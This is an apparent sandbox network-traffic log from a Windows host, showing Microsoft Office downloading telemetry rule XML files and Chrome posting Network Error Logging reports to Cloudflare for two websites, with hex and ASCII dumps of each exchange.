                                                    2024-11-25 18:44:47 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    49192.168.2.44980213.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:47 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:47 UTC494INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:47 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 3788
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                    ETag: "0x8DC582BAC2126A6"
                                                    x-ms-request-id: 329761bd-201e-0003-2da4-3ef85a000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184447Z-15b8b599d88cn5thhC1TEBqxkn000000065000000000k0wq
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:47 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    50192.168.2.44980413.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:47 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:47 UTC494INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:47 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 2160
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                    ETag: "0x8DC582BA3B95D81"
                                                    x-ms-request-id: 070f5f04-601e-005c-0de2-3df06f000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184447Z-174c587ffdf4zw2thC1TEBu34000000006c000000000h7ev
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:47 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    51192.168.2.44980813.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:49 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:50 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:49 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 415
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                    ETag: "0x8DC582B9F6F3512"
                                                    x-ms-request-id: 30601852-401e-0047-7476-3b8597000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184449Z-174c587ffdfgcs66hC1TEB69cs000000062g00000000uspt
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:50 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    52192.168.2.44980713.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:49 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:50 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:50 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 474
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                    ETag: "0x8DC582B9964B277"
                                                    x-ms-request-id: 73bf7d7c-c01e-000b-6bd1-3ee255000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184449Z-178bfbc474bv7whqhC1NYC1fg400000007y0000000003w4r
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:50 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    53192.168.2.44981013.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:49 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:50 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:50 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 632
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                    ETag: "0x8DC582BB6E3779E"
                                                    x-ms-request-id: 5e8702c1-301e-000c-0b8f-3b323f000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184450Z-174c587ffdf4zw2thC1TEBu34000000006ag00000000r8gg
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:50 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    54192.168.2.44980913.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:49 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:50 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:50 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 471
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                    ETag: "0x8DC582BB10C598B"
                                                    x-ms-request-id: 9b21b011-b01e-0021-05fc-3ecab7000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184450Z-174c587ffdf59vqchC1TEByk6800000006dg00000000m47f
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:50 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    55192.168.2.44981113.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:49 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:50 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:50 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 467
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                    ETag: "0x8DC582BA6C038BC"
                                                    x-ms-request-id: 6ebbc676-001e-005a-784b-3cc3d0000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184450Z-15b8b599d88cn5thhC1TEBqxkn00000006a0000000001smv
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:50 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    56192.168.2.44981235.190.80.14432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:50 UTC546OUTOPTIONS /report/v4?s=xyifoI35i%2FMJzlipwl%2FxusHBjg2%2BqvOlnGIX%2Bba20MeoFKI90K%2FbtfKZq3i%2BwaJVe9%2BdFyCFH8%2FD5FUH7Ij8YJTyFni80eprsSggv5cpQwS8c2zSGBRfNbNopSqqvi3wKYM%3D HTTP/1.1
                                                    Host: a.nel.cloudflare.com
                                                    Connection: keep-alive
                                                    Origin: https://yancesybros.com
                                                    Access-Control-Request-Method: POST
                                                    Access-Control-Request-Headers: content-type
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:50 UTC336INHTTP/1.1 200 OK
                                                    Content-Length: 0
                                                    access-control-max-age: 86400
                                                    access-control-allow-methods: OPTIONS, POST
                                                    access-control-allow-origin: *
                                                    access-control-allow-headers: content-length, content-type
                                                    date: Mon, 25 Nov 2024 18:44:50 GMT
                                                    Via: 1.1 google
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    57192.168.2.44981335.190.80.14432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:50 UTC538OUTOPTIONS /report/v4?s=QenT1uH9OoSpHete%2BQQiHKTgNBfukx%2FXYGk9UxFsUG0WGJfkaYgxdBu1LuP5yZqNoShH%2FqyOiZVX3xU8FGE9TzExwaq%2Bx5dVMm8zIX5qZLYGahygqYm9twgG1mKZONogb0Y%3D HTTP/1.1
                                                    Host: a.nel.cloudflare.com
                                                    Connection: keep-alive
                                                    Origin: https://yancesybros.com
                                                    Access-Control-Request-Method: POST
                                                    Access-Control-Request-Headers: content-type
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:50 UTC336INHTTP/1.1 200 OK
                                                    Content-Length: 0
                                                    access-control-max-age: 86400
                                                    access-control-allow-methods: OPTIONS, POST
                                                    access-control-allow-origin: *
                                                    access-control-allow-headers: content-type, content-length
                                                    date: Mon, 25 Nov 2024 18:44:50 GMT
                                                    Via: 1.1 google
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    58192.168.2.44981435.190.80.14432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:50 UTC543OUTOPTIONS /report/v4?s=Ek%2F%2FV9upZKQuA%2FRHsyDfpn47ZTf5WV0rEtxgVmOKzFXP3eAKsy%2B33ZlWUTfyyBQAA9MB2qhwLMuHT0x11KU2PV%2Bf8Q9z%2FlueFzpcogQmGAuYAq%2BQhWFzbFEQjmxBwg%3D%3D HTTP/1.1
                                                    Host: a.nel.cloudflare.com
                                                    Connection: keep-alive
                                                    Origin: https://nl.nsiciumbe.com
                                                    Access-Control-Request-Method: POST
                                                    Access-Control-Request-Headers: content-type
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:50 UTC336INHTTP/1.1 200 OK
                                                    Content-Length: 0
                                                    access-control-max-age: 86400
                                                    access-control-allow-methods: OPTIONS, POST
                                                    access-control-allow-origin: *
                                                    access-control-allow-headers: content-type, content-length
                                                    date: Mon, 25 Nov 2024 18:44:50 GMT
                                                    Via: 1.1 google
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    59192.168.2.44982135.190.80.14432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:51 UTC489OUTPOST /report/v4?s=xyifoI35i%2FMJzlipwl%2FxusHBjg2%2BqvOlnGIX%2Bba20MeoFKI90K%2FbtfKZq3i%2BwaJVe9%2BdFyCFH8%2FD5FUH7Ij8YJTyFni80eprsSggv5cpQwS8c2zSGBRfNbNopSqqvi3wKYM%3D HTTP/1.1
                                                    Host: a.nel.cloudflare.com
                                                    Connection: keep-alive
                                                    Content-Length: 1269
                                                    Content-Type: application/reports+json
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:51 UTC1269OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 39 35 35 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 35 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 38 39 2e 37 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 79 61 6e 63 65 73 79 62 72 6f 73 2e
                                                    Data Ascii: [{"age":59559,"body":{"elapsed_time":450,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.189.74","status_code":403,"type":"http.error"},"type":"network-error","url":"https://yancesybros.
                                                    2024-11-25 18:44:52 UTC168INHTTP/1.1 200 OK
                                                    Content-Length: 0
                                                    date: Mon, 25 Nov 2024 18:44:51 GMT
                                                    Via: 1.1 google
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    60192.168.2.44981613.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:51 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:52 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:52 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 407
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                    ETag: "0x8DC582BBAD04B7B"
                                                    x-ms-request-id: c9282152-e01e-0033-34a3-3e4695000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184452Z-15b8b599d88n8stkhC1TEBb78n000000015g00000000ct02
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:52 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
